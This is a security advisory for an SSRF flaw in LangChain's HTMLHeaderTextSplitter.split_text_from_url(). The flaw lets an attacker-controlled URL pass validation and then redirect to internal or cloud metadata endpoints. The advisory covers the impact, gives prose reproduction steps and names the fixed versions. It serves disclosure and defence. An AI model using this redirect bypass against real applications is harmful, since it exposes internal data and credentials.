LangChain HTMLHeaderTextSplitter SSRF Vulnerability in Text Splitter Component
Vulnerability
A server-side request forgery (SSRF) vulnerability has been identified in the LangChain framework, specifically in the 'langchain-text-splitters' package versions prior to 1.1.2. The issue arises in the 'HTMLHeaderTextSplitter.split_text_from_url()' method, which initially validates URLs but then fetches them with redirects enabled. This flaw allows an attacker to redirect to internal or cloud metadata endpoints, bypassing SSRF protections. The vulnerability could lead to data exfiltration if the application exposes the fetched Document contents back to the requester.
Impact
Exploitation of this vulnerability could allow an attacker to access internal endpoints or cloud metadata services, potentially leading to unauthorized data exposure. This is particularly concerning for applications that return Document contents to the requester, as sensitive data from internal sources could be leaked.
Reproduction
To reproduce this vulnerability, pass a URL controlled by an attacker to the 'split_text_from_url()' method of the 'HTMLHeaderTextSplitter' class. The URL must first pass the 'validate_safe_url()' check. Once the URL is fetched, the 'requests.get()' method will follow any redirects to internal endpoints, taking advantage of the fact that redirect targets are not revalidated.
Remediation
Users are advised to update to 'langchain-text-splitters' version 1.1.2 or later. The fixed version requires 'langchain-core' version 1.2.31 or later. Additionally, 'split_text_from_url()' has been deprecated; users should manually fetch HTML content and pass it to the 'split_text()' method.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.
